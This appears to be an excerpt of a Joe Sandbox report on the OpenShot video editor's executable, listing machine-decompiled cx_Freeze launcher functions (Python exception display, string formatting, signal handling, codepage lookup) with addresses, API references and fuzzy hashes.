                                                                    				struct HWND__* _t29;
                                                                    				struct HWND__* _t31;
                                                                    				struct HWND__** _t33;
                                                                    
                                                                    				L003020C0();
                                                                    				_a8 = 0;
                                                                    				_a4 = 0x21;
                                                                    				 *__esp = "cx_Freeze: Application Terminated";
                                                                    				L00302048();
                                                                    				if(__eax != 0) {
                                                                    					_t22 = _a24;
                                                                    					_a4 = "code";
                                                                    					 *_t33 = _t22;
                                                                    					L00302078();
                                                                    					if(_t22 == 0) {
                                                                    						L003020C0();
                                                                    						_t22 = _a24;
                                                                    					} else {
                                                                    						_a24 = _t22;
                                                                    						if(_t22 == __imp___Py_NoneStruct) {
                                                                    							 *_t33 = 0;
                                                                    							L00302028();
                                                                    							L16:
                                                                    							 *_t33 = _t31;
                                                                    							L00302050();
                                                                    							L12:
                                                                    							_a12 = 0x10;
                                                                    							_a8 = _t29;
                                                                    							_a4 = _t22;
                                                                    							 *_t33 = 0;
                                                                    							MessageBoxW(??, ??, ??, ??);
                                                                    							_t22 = 1;
                                                                    							_t33 = _t33 - 0x10;
                                                                    							L13:
                                                                    							 *_t33 = _t22;
                                                                    							L00302028();
                                                                    							L14:
                                                                    							L00302090();
                                                                    							goto L13;
                                                                    						}
                                                                    					}
                                                                    					 *_t33 = _t22;
                                                                    					if(( *( *((intOrPtr*)(_t22 + 4)) + 0x57) & 0x00000001) != 0) {
                                                                    						goto L14;
                                                                    					}
                                                                    					L00302070();
                                                                    					_t31 = _t22;
                                                                    					if(_t22 != 0) {
                                                                    						_t29 =  *(_t26 + 0x14);
                                                                    						if(_t29 == 0) {
                                                                    							 *_t33 = _t26;
                                                                    							L00302050();
                                                                    							_t29 = _t22;
                                                                    						}
                                                                    						_t22 =  *(_t31 + 0x14);
                                                                    						if(_t22 == 0) {
                                                                    							goto L16;
                                                                    						}
                                                                    						goto L12;
                                                                    					}
                                                                    					_a12 = 0x10;
                                                                    					_a8 = "cx_Freeze Fatal Error";
                                                                    					_a4 = "Cannot get string representation of messsage.";
                                                                    					 *_t33 = 0;
                                                                    					MessageBoxA(??, ??, ??, ??);
                                                                    					L00302020();
                                                                    				} else {
                                                                    					__eax = MessageBoxA(0, "Cannot create caption string object.", "cx_Freeze Fatal Error", 0x10);
                                                                    					__esp = __esp - 0x10;
                                                                    					L00302020();
                                                                    				}
                                                                    				return 0xffffffff;
                                                                    			}








                                                                    0x003019b8
                                                                    0x003019bd
                                                                    0x003019c5
                                                                    0x003019cd
                                                                    0x003019d4
                                                                    0x003019dd
                                                                    0x0030192d
                                                                    0x00301931
                                                                    0x00301939
                                                                    0x0030193c
                                                                    0x00301943
                                                                    0x00301a18
                                                                    0x00301a1d
                                                                    0x00301949
                                                                    0x00301949
                                                                    0x00301953
                                                                    0x00301a68
                                                                    0x00301a6f
                                                                    0x00301a74
                                                                    0x00301a74
                                                                    0x00301a77
                                                                    0x00301a34
                                                                    0x00301a34
                                                                    0x00301a3c
                                                                    0x00301a40
                                                                    0x00301a44
                                                                    0x00301a4b
                                                                    0x00301a51
                                                                    0x00301a56
                                                                    0x00301a59
                                                                    0x00301a59
                                                                    0x00301a5c
                                                                    0x00301a61
                                                                    0x00301a61
                                                                    0x00000000
                                                                    0x00301a61
                                                                    0x00301953
                                                                    0x00301960
                                                                    0x00301963
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00301969
                                                                    0x0030196e
                                                                    0x00301972
                                                                    0x00301a26
                                                                    0x00301a2b
                                                                    0x00301a7e
                                                                    0x00301a81
                                                                    0x00301a86
                                                                    0x00301a86
                                                                    0x00301a2d
                                                                    0x00301a32
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00301a32
                                                                    0x00301978
                                                                    0x00301980
                                                                    0x00301988
                                                                    0x00301990
                                                                    0x00301997
                                                                    0x003019a0
                                                                    0x003019e3
                                                                    0x00301a02
                                                                    0x00301a08
                                                                    0x00301a0b
                                                                    0x00301a0b
                                                                    0x003019b0

                                                                    APIs
                                                                    • PyObject_GetAttrString.LIBPYTHON3.8(?,?,00000000,00000001,00301FF5), ref: 0030193C
                                                                    • PyObject_Str.LIBPYTHON3.8(?,?,00000000,00000001,00301FF5), ref: 00301969
                                                                    • MessageBoxA.USER32 ref: 00301997
                                                                    • Py_Finalize.LIBPYTHON3.8 ref: 003019A0
                                                                    • PyErr_Clear.LIBPYTHON3.8(?,?,00000000,00000001,00301FF5), ref: 003019B8
                                                                    • PyUnicode_DecodeASCII.LIBPYTHON3.8(?,?,00000000,00000001,00301FF5), ref: 003019D4
                                                                    • MessageBoxA.USER32 ref: 00301A02
                                                                    • Py_Finalize.LIBPYTHON3.8 ref: 00301A0B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: Finalize.MessageObject_$AttrClear.DecodeErr_Str.String.Unicode_
                                                                    • String ID: !$Cannot create caption string object.$cx_Freeze Fatal Error$cx_Freeze: Application Terminated
                                                                    • API String ID: 39956422-2091684428
                                                                    • Opcode ID: a3aefdc625e880bd86bdf2a0dcec4895f0cba5e2a30d018f48b3e2e6977ce3e5
                                                                    • Instruction ID: c4ddba1333d5010bd278208255505e8b7dcfed8f4a9ff70e663cc2aeca3cb823
                                                                    • Opcode Fuzzy Hash: a3aefdc625e880bd86bdf2a0dcec4895f0cba5e2a30d018f48b3e2e6977ce3e5
                                                                    • Instruction Fuzzy Hash: 11F0C0B150A7019AE7426F68E47935FBBE0AB44354F11891DE5D84B2D1D7B98488CB83
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 19%
                                                                    			E00303140(char* __eax, char** __ecx, signed char __edx) {
                                                                    				intOrPtr _t33;
                                                                    				char* _t34;
                                                                    				signed char _t35;
                                                                    				signed char _t36;
                                                                    				int _t37;
                                                                    				signed char _t39;
                                                                    				signed char _t40;
                                                                    				signed char _t45;
                                                                    				signed char _t48;
                                                                    				char* _t49;
                                                                    				signed char _t52;
                                                                    				char* _t63;
                                                                    				signed char _t64;
                                                                    				char** _t66;
                                                                    				void* _t67;
                                                                    				char** _t68;
                                                                    
                                                                    				_t66 = __ecx;
                                                                    				_t65 = __edx;
                                                                    				_t49 = __eax;
                                                                    				_t68 = _t67 - 0x4c;
                                                                    				_t33 =  *((intOrPtr*)(__ecx + 0xc));
                                                                    				if(_t33 >= 0) {
                                                                    					_t65 =  >  ? _t33 : __edx;
                                                                    				}
                                                                    				_t52 = _t66[1];
                                                                    				_t34 = _t66[2];
                                                                    				if((_t52 & 0x00006000) == 0x6000) {
                                                                    					_t63 =  *_t66;
                                                                    					__eflags = _t34 - _t65;
                                                                    					if(_t34 <= _t65) {
                                                                    						_t68[3] = _t49;
                                                                    						_t68[2] = _t65;
                                                                    						_t68[1] = L"%.*S";
                                                                    						 *_t68 = _t63;
                                                                    						_t35 = fwprintf(??, ??);
                                                                    					} else {
                                                                    						_t68[4] = _t49;
                                                                    						_t68[3] = _t65;
                                                                    						_t68[2] = _t34;
                                                                    						__eflags = _t52 & 0x00000004;
                                                                    						if((_t52 & 0x00000004) != 0) {
                                                                    							_t68[1] = L"%-*.*S";
                                                                    							 *_t68 = _t63;
                                                                    							_t35 = fwprintf(??, ??);
                                                                    						} else {
                                                                    							_t68[1] = L"%*.*S";
                                                                    							 *_t68 = _t63;
                                                                    							_t35 = fwprintf(??, ??);
                                                                    						}
                                                                    					}
                                                                    					__eflags = _t35;
                                                                    					if(_t35 > 0) {
                                                                    						_t25 =  &(_t66[8]);
                                                                    						 *_t25 = _t66[8] + _t35;
                                                                    						__eflags =  *_t25;
                                                                    					}
                                                                    					_t66[2] = 0xffffffff;
                                                                    					return _t35;
                                                                    				} else {
                                                                    					if(_t34 > _t65) {
                                                                    						_t36 = _t34 - _t65;
                                                                    						_t66[2] = _t36;
                                                                    						__eflags = _t52 & 0x00000004;
                                                                    						if((_t52 & 0x00000004) == 0) {
                                                                    							_t45 = _t36 - 1;
                                                                    							__eflags = _t45;
                                                                    							_t66[2] = _t45;
                                                                    							do {
                                                                    								E003030E0(0x20, _t66);
                                                                    								_t48 = _t66[2];
                                                                    								_t66[2] = _t48 - 1;
                                                                    								__eflags = _t48;
                                                                    							} while (_t48 != 0);
                                                                    						}
                                                                    						goto L5;
                                                                    						L18:
                                                                    						return _t40;
                                                                    						goto L27;
                                                                    					} else {
                                                                    						_t66[2] = 0xffffffff;
                                                                    					}
                                                                    					L5:
                                                                    					_t64 =  &(_t68[8]);
                                                                    					if(_t65 > 0) {
                                                                    						while(1) {
                                                                    							 *_t64 = 0;
                                                                    							_t65 = _t65 - 1;
                                                                    							 *((intOrPtr*)(_t64 + 4)) = 0;
                                                                    							 *_t68 = _t49;
                                                                    							_t37 = strlen(??);
                                                                    							_t68[3] = _t64;
                                                                    							_t68[2] = _t37;
                                                                    							_t68[1] = _t49;
                                                                    							 *_t68 =  &(_t68[0xa]);
                                                                    							_t39 = E003085A0();
                                                                    							__eflags = _t39;
                                                                    							if(__eflags == 0) {
                                                                    								goto L17;
                                                                    							}
                                                                    							if(__eflags >= 0) {
                                                                    								_t57 = _t68[0xa] & 0x0000ffff;
                                                                    							} else {
                                                                    								_t57 =  *_t49;
                                                                    								_t39 = 1;
                                                                    								_t68[0xa] =  *_t49;
                                                                    							}
                                                                    							_t49 =  &(_t49[_t39]);
                                                                    							E003030E0(_t57 & 0x0000ffff, _t66);
                                                                    							__eflags = _t65;
                                                                    							if(_t65 != 0) {
                                                                    								continue;
                                                                    							}
                                                                    							goto L17;
                                                                    						}
                                                                    					} else {
                                                                    						while(1) {
                                                                    							L17:
                                                                    							_t40 = _t66[2];
                                                                    							_t66[2] = _t40 - 1;
                                                                    							if(_t40 <= 0) {
                                                                    								goto L18;
                                                                    							}
                                                                    							E003030E0(0x20, _t66);
                                                                    						}
                                                                    						goto L18;
                                                                    					}
                                                                    					goto L17;
                                                                    				}
                                                                    				L27:
                                                                    			}



















                                                                    0x00303141
                                                                    0x00303145
                                                                    0x00303148
                                                                    0x0030314a
                                                                    0x0030314d
                                                                    0x00303152
                                                                    0x00303156
                                                                    0x00303156
                                                                    0x00303159
                                                                    0x0030315c
                                                                    0x0030316d
                                                                    0x00303248
                                                                    0x0030324b
                                                                    0x0030324d
                                                                    0x00303286
                                                                    0x0030328a
                                                                    0x0030328e
                                                                    0x00303296
                                                                    0x00303299
                                                                    0x0030324f
                                                                    0x0030324f
                                                                    0x00303253
                                                                    0x00303257
                                                                    0x0030325b
                                                                    0x0030325e
                                                                    0x003032a0
                                                                    0x003032a8
                                                                    0x003032ab
                                                                    0x00303260
                                                                    0x00303260
                                                                    0x00303268
                                                                    0x0030326b
                                                                    0x0030326b
                                                                    0x0030325e
                                                                    0x00303270
                                                                    0x00303272
                                                                    0x00303274
                                                                    0x00303274
                                                                    0x00303274
                                                                    0x00303274
                                                                    0x00303277
                                                                    0x00303285
                                                                    0x00303173
                                                                    0x00303175
                                                                    0x003031f0
                                                                    0x003031f2
                                                                    0x003031f5
                                                                    0x003031f8
                                                                    0x003031fa
                                                                    0x003031fa
                                                                    0x003031fd
                                                                    0x00303200
                                                                    0x00303207
                                                                    0x0030320c
                                                                    0x00303212
                                                                    0x00303215
                                                                    0x00303215
                                                                    0x00303219
                                                                    0x00000000
                                                                    0x00303239
                                                                    0x00303240
                                                                    0x00000000
                                                                    0x00303177
                                                                    0x00303177
                                                                    0x00303177
                                                                    0x0030317e
                                                                    0x0030317e
                                                                    0x00303184
                                                                    0x003031a9
                                                                    0x003031a9
                                                                    0x003031af
                                                                    0x003031b2
                                                                    0x003031b9
                                                                    0x003031bc
                                                                    0x003031c1
                                                                    0x003031c5
                                                                    0x003031cd
                                                                    0x003031d1
                                                                    0x003031d4
                                                                    0x003031d9
                                                                    0x003031db
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x003031dd
                                                                    0x00303190
                                                                    0x003031df
                                                                    0x003031df
                                                                    0x003031e3
                                                                    0x003031e8
                                                                    0x003031e8
                                                                    0x00303195
                                                                    0x0030319c
                                                                    0x003031a1
                                                                    0x003031a3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x003031a3
                                                                    0x00303186
                                                                    0x0030322c
                                                                    0x0030322c
                                                                    0x0030322c
                                                                    0x00303232
                                                                    0x00303237
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00303227
                                                                    0x00303227
                                                                    0x00000000
                                                                    0x0030322c
                                                                    0x00000000
                                                                    0x00303184
                                                                    0x00000000

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %*.*S$%-*.*S$%.*S
                                                                    • API String ID: 0-2115465065
                                                                    • Opcode ID: 31f2d2182b871bafb812992734f65ab8346ed9a89751cff87bd6754b5e2051c5
                                                                    • Instruction ID: 1b4439015e62a89a1ef81126b13230887f655072f8b44ade8f560f6b0522dd50
                                                                    • Opcode Fuzzy Hash: 31f2d2182b871bafb812992734f65ab8346ed9a89751cff87bd6754b5e2051c5
                                                                    • Instruction Fuzzy Hash: 0341A7B16067159BD7129F29D4A435EBBECFF88754F15CA2DE8888B3C1D735CA408B82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 67%
                                                                    			E00302830(signed int** _a4) {
                                                                    				intOrPtr _v24;
                                                                    				signed int** _t25;
                                                                    				intOrPtr* _t26;
                                                                    				void* _t27;
                                                                    				void* _t28;
                                                                    
                                                                    				_t26 =  &_v24;
                                                                    				_t25 = _a4;
                                                                    				_t12 =  *( *_t25);
                                                                    				_t27 = _t12 - 0xc0000093;
                                                                    				if(_t27 == 0) {
                                                                    					L5:
                                                                    					_v24 = 0;
                                                                    					 *_t26 = 8;
                                                                    					L00308338();
                                                                    					if(_t12 == 1) {
                                                                    						_v24 = 1;
                                                                    						 *_t26 = 8;
                                                                    						L00308338();
                                                                    						E00302370(_t12);
                                                                    						return 0xffffffff;
                                                                    					}
                                                                    					L6:
                                                                    					if(_t12 != 0) {
                                                                    						 *_t26 = 8;
                                                                    						 *_t12();
                                                                    						return 0xffffffff;
                                                                    					}
                                                                    					L7:
                                                                    					_t12 =  *0x30f0e0;
                                                                    					if( *0x30f0e0 == 0) {
                                                                    						return 0;
                                                                    					}
                                                                    					_a4 = _t25;
                                                                    					_t26 = _t26 + 0x18;
                                                                    					_pop(_t25);
                                                                    					goto __eax;
                                                                    				}
                                                                    				if(_t27 > 0) {
                                                                    					if(_t12 != 0xc0000094) {
                                                                    						if(_t12 != 0xc0000096) {
                                                                    							goto L7;
                                                                    						}
                                                                    						L17:
                                                                    						_v24 = 0;
                                                                    						 *_t26 = 4;
                                                                    						L00308338();
                                                                    						if(_t12 == 1) {
                                                                    							_v24 = 1;
                                                                    							 *_t26 = 4;
                                                                    							L00308338();
                                                                    							return _t12 | 0xffffffff;
                                                                    						}
                                                                    						if(_t12 == 0) {
                                                                    							goto L7;
                                                                    						}
                                                                    						 *_t26 = 4;
                                                                    						 *_t12();
                                                                    						return 0xffffffff;
                                                                    					}
                                                                    					_v24 = 0;
                                                                    					 *_t26 = 8;
                                                                    					L00308338();
                                                                    					if(_t12 != 1) {
                                                                    						goto L6;
                                                                    					}
                                                                    					_v24 = 1;
                                                                    					 *_t26 = 8;
                                                                    					L00308338();
                                                                    					return 0xffffffff;
                                                                    				}
                                                                    				_t28 = _t12 - 0xc000001d;
                                                                    				if(_t28 == 0) {
                                                                    					goto L17;
                                                                    				}
                                                                    				if(_t28 <= 0) {
                                                                    					if(_t12 != 0xc0000005) {
                                                                    						goto L7;
                                                                    					}
                                                                    					_v24 = 0;
                                                                    					 *_t26 = 0xb;
                                                                    					L00308338();
                                                                    					if(_t12 == 1) {
                                                                    						_v24 = 1;
                                                                    						 *_t26 = 0xb;
                                                                    						L00308338();
                                                                    						return _t12 | 0xffffffff;
                                                                    					}
                                                                    					if(_t12 == 0) {
                                                                    						goto L7;
                                                                    					}
                                                                    					 *_t26 = 0xb;
                                                                    					 *_t12();
                                                                    					return 0xffffffff;
                                                                    				}
                                                                    				_t12 = _t12 + 0x3fffff73;
                                                                    				if(_t12 > 4) {
                                                                    					goto L7;
                                                                    				}
                                                                    				goto L5;
                                                                    			}








                                                                    0x00302831
                                                                    0x00302834
                                                                    0x0030283a
                                                                    0x0030283c
                                                                    0x00302841
                                                                    0x00302860
                                                                    0x00302860
                                                                    0x00302868
                                                                    0x0030286f
                                                                    0x00302877
                                                                    0x00302970
                                                                    0x00302978
                                                                    0x0030297f
                                                                    0x00302984
                                                                    0x00000000
                                                                    0x00302989
                                                                    0x0030287d
                                                                    0x0030287f
                                                                    0x00302990
                                                                    0x00302997
                                                                    0x00000000
                                                                    0x00302999
                                                                    0x00302885
                                                                    0x00302885
                                                                    0x0030288c
                                                                    0x00000000
                                                                    0x00302960
                                                                    0x00302892
                                                                    0x00302896
                                                                    0x00302899
                                                                    0x0030289a
                                                                    0x0030289a
                                                                    0x00302843
                                                                    0x003028a5
                                                                    0x00302925
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0030292b
                                                                    0x0030292b
                                                                    0x00302933
                                                                    0x0030293a
                                                                    0x00302942
                                                                    0x003029b9
                                                                    0x003029c1
                                                                    0x003029c8
                                                                    0x00000000
                                                                    0x003029cd
                                                                    0x00302946
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0030294c
                                                                    0x00302953
                                                                    0x00000000
                                                                    0x00302955
                                                                    0x003028a7
                                                                    0x003028af
                                                                    0x003028b6
                                                                    0x003028be
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x003028c0
                                                                    0x003028c8
                                                                    0x003028cf
                                                                    0x00000000
                                                                    0x003028d4
                                                                    0x00302845
                                                                    0x0030284a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00302850
                                                                    0x003028e5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x003028e7
                                                                    0x003028ef
                                                                    0x003028f6
                                                                    0x003028fe
                                                                    0x003029a0
                                                                    0x003029a8
                                                                    0x003029af
                                                                    0x00000000
                                                                    0x003029b4
                                                                    0x00302906
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0030290c
                                                                    0x00302913
                                                                    0x00000000
                                                                    0x00302915
                                                                    0x00302856
                                                                    0x0030285e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: signal
                                                                    • String ID:
                                                                    • API String ID: 1946981877-0
                                                                    • Opcode ID: de93d4a163490c4ee26553aff184e742acd496c1d31a13053ac0de23ad9c0d34
                                                                    • Instruction ID: 25b9d35d291c237cc57d0496398d01163d73fcc43d2785420ea1e38958b7b61d
                                                                    • Opcode Fuzzy Hash: de93d4a163490c4ee26553aff184e742acd496c1d31a13053ac0de23ad9c0d34
                                                                    • Instruction Fuzzy Hash: C3314D784063018AE7226F68C87C32F76D4BF45768F168A19E8E4DB2D1CB79C8949B53
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: fputwc$memset
                                                                    • String ID: 0$o
                                                                    • API String ID: 822753988-4157579757
                                                                    • Opcode ID: c6a443d035df4a0860c72b7efa01e9da5eb68cf50b6754192bb00b8193dd32f4
                                                                    • Instruction ID: 5b0d0f9b208c95e2ba51e070eef521a237cb9ec74cad726523f7f011166568fc
                                                                    • Opcode Fuzzy Hash: c6a443d035df4a0860c72b7efa01e9da5eb68cf50b6754192bb00b8193dd32f4
                                                                    • Instruction Fuzzy Hash: 43F17F72E122158FDB16CF68D4A439DBBF5BF88310F158269E855AB385D730EE41CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule
                                                                    • String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
                                                                    • API String ID: 667068680-1145701848
                                                                    • Opcode ID: 26dc3171bf08b3b0e2ee76cb1661c07175b5d28e0948c5c1b0c8d557d9375dab
                                                                    • Instruction ID: 26513f34917e93a2c61a8b2c85e12bedd6bf38225187ae981798d8078d391b23
                                                                    • Opcode Fuzzy Hash: 26dc3171bf08b3b0e2ee76cb1661c07175b5d28e0948c5c1b0c8d557d9375dab
                                                                    • Instruction Fuzzy Hash: 37F012B49467108FC7027F3C6E6825A7BE8EA04350F55853AD8C9C7295EBB4C454CBA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 72%
                                                                    			E00301B51(char* __ebx, char* _a4, char* _a8, intOrPtr _a12, char* _a24) {
                                                                    				char* _t28;
                                                                    				void* _t30;
                                                                    				char* _t35;
                                                                    				char _t37;
                                                                    				char* _t43;
                                                                    				char* _t44;
                                                                    				char* _t56;
                                                                    				char _t58;
                                                                    				char** _t60;
                                                                    
                                                                    				_t41 = __ebx;
                                                                    				__eax = __imp___Py_NoneStruct;
                                                                    				 *_t28 =  *_t28 + 1;
                                                                    				 *(__ebx + 0x14) = _t28;
                                                                    				 *_t60 = "excepthook";
                                                                    				L00302068();
                                                                    				 *_t60 = "__excepthook__";
                                                                    				_t56 = _t28;
                                                                    				L00302068();
                                                                    				if(_t56 == 0 || _t56 == _t28) {
                                                                    					 *_t60 = "traceback";
                                                                    					L00302098();
                                                                    					if(_t28 == 0) {
                                                                    						_t30 = E00301600(_a24, "Cannot import traceback module.");
                                                                    						goto L5;
                                                                    					} else {
                                                                    						_a4 = "format_exception";
                                                                    						 *_t60 = _t28;
                                                                    						L00302078();
                                                                    						if(_t28 == 0) {
                                                                    							_t30 = E00301600(_a24, "Cannot get format_exception method.");
                                                                    							goto L5;
                                                                    						} else {
                                                                    							_a4 = _t41;
                                                                    							 *_t60 = _t28;
                                                                    							L00302080();
                                                                    							_t43 = _t28;
                                                                    							if(_t28 == 0) {
                                                                    								_t30 = E00301600(_a24, "Exception raised when calling format_exception.");
                                                                    								goto L5;
                                                                    							} else {
                                                                    								_a8 = 0;
                                                                    								_a4 = 0;
                                                                    								 *_t60 = 0x30a2fc;
                                                                    								L00302048();
                                                                    								if(_t28 == 0) {
                                                                    									_t30 = E00301600(_a24, "Cannot create empty string object.");
                                                                    									goto L5;
                                                                    								} else {
                                                                    									_a4 = _t43;
                                                                    									 *_t60 = _t28;
                                                                    									L00302030();
                                                                    									_t44 = _t28;
                                                                    									if(_t28 == 0) {
                                                                    										_t30 = E00301600(_a24, "Cannot join exception strings.");
                                                                    										goto L5;
                                                                    									} else {
                                                                    										_t35 = _a24;
                                                                    										_a4 = "caption";
                                                                    										 *_t60 = _t35;
                                                                    										L00302078();
                                                                    										if(_t35 == 0 || ( *(_t35[4] + 0x57) & 0x00000010) == 0) {
                                                                    											L003020C0();
                                                                    											_a8 = 0;
                                                                    											_a4 = 0x26;
                                                                    											 *_t60 = "cx_Freeze: Python error in main script";
                                                                    											L00302048();
                                                                    											if(_t35 == 0) {
                                                                    												_t30 = E00301600(_a24, "Cannot create default caption string.");
                                                                    												goto L5;
                                                                    											} else {
                                                                    												goto L15;
                                                                    											}
                                                                    										} else {
                                                                    											L15:
                                                                    											_t58 = _t35[0x14];
                                                                    											if(_t58 == 0) {
                                                                    												 *_t60 = _t35;
                                                                    												L00302050();
                                                                    												_t58 = _t35;
                                                                    											}
                                                                    											_t37 = _t44[0x14];
                                                                    											if(_t37 == 0) {
                                                                    												 *_t60 = _t44;
                                                                    												L00302050();
                                                                    											}
                                                                    											_a8 = _t58;
                                                                    											_a12 = 0x10;
                                                                    											_a4 = _t37;
                                                                    											 *_t60 = 0;
                                                                    											MessageBoxW(??, ??, ??, ??);
                                                                    											return 0xffffffff;
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				} else {
                                                                    					_a4 = __ebx;
                                                                    					 *_t60 = _t56;
                                                                    					L00302080();
                                                                    					if(_t28 != 0) {
                                                                    						_t30 = 0xffffffff;
                                                                    					} else {
                                                                    						_t30 = E00301600(_a24, "Error in sys.excepthook.");
                                                                    					}
                                                                    					L5:
                                                                    					return _t30;
                                                                    				}
                                                                    			}












                                                                    0x00301b51
                                                                    0x00301b58
                                                                    0x00301b00
                                                                    0x00301b03
                                                                    0x00301b06
                                                                    0x00301b0d
                                                                    0x00301b12
                                                                    0x00301b19
                                                                    0x00301b1b
                                                                    0x00301b22
                                                                    0x00301b98
                                                                    0x00301b9f
                                                                    0x00301ba6
                                                                    0x00301cc1
                                                                    0x00000000
                                                                    0x00301bac
                                                                    0x00301bac
                                                                    0x00301bb4
                                                                    0x00301bb7
                                                                    0x00301bbe
                                                                    0x00301cd9
                                                                    0x00000000
                                                                    0x00301bc4
                                                                    0x00301bc4
                                                                    0x00301bc8
                                                                    0x00301bcb
                                                                    0x00301bd0
                                                                    0x00301bd4
                                                                    0x00301cf1
                                                                    0x00000000
                                                                    0x00301bda
                                                                    0x00301bda
                                                                    0x00301be2
                                                                    0x00301bea
                                                                    0x00301bf1
                                                                    0x00301bf8
                                                                    0x00301d21
                                                                    0x00000000
                                                                    0x00301bfe
                                                                    0x00301bfe
                                                                    0x00301c02
